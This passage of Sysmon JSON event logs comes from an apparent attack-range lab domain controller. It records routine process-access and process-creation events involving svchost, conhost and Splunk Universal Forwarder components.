05:54:50.926","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5898,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5899,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5900,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5901,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5902,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.926\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03AA-5F25-0000-0010D0F60A00}\r\nTargetProcessId: 3484\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.926","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03AA-5F25-0000-0010D0F60A00}","TargetProcessId":"3484","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5903,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.067\r\nSourceProcessGUID: {A837DB8D-03AA-5F25-0000-0010D0F60A00}\r\nSourceProcessId: 3484\r\nSourceThreadId: 4120\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.067","SourceProcessGUID":"{A837DB8D-03AA-5F25-0000-0010D0F60A00}","SourceProcessId":"3484","SourceThreadId":"4120","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5904,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nProcessGuid: {A837DB8D-03AB-5F25-0000-0010BBF80A00}\r\nProcessId: 5076\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","ProcessGuid":"{A837DB8D-03AB-5F25-0000-0010BBF80A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5905,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:51.661\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03AB-5F25-0000-0010BBF80A00}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:51.661","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03AB-5F25-0000-0010BBF80A00}","TargetProcessId":"5076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
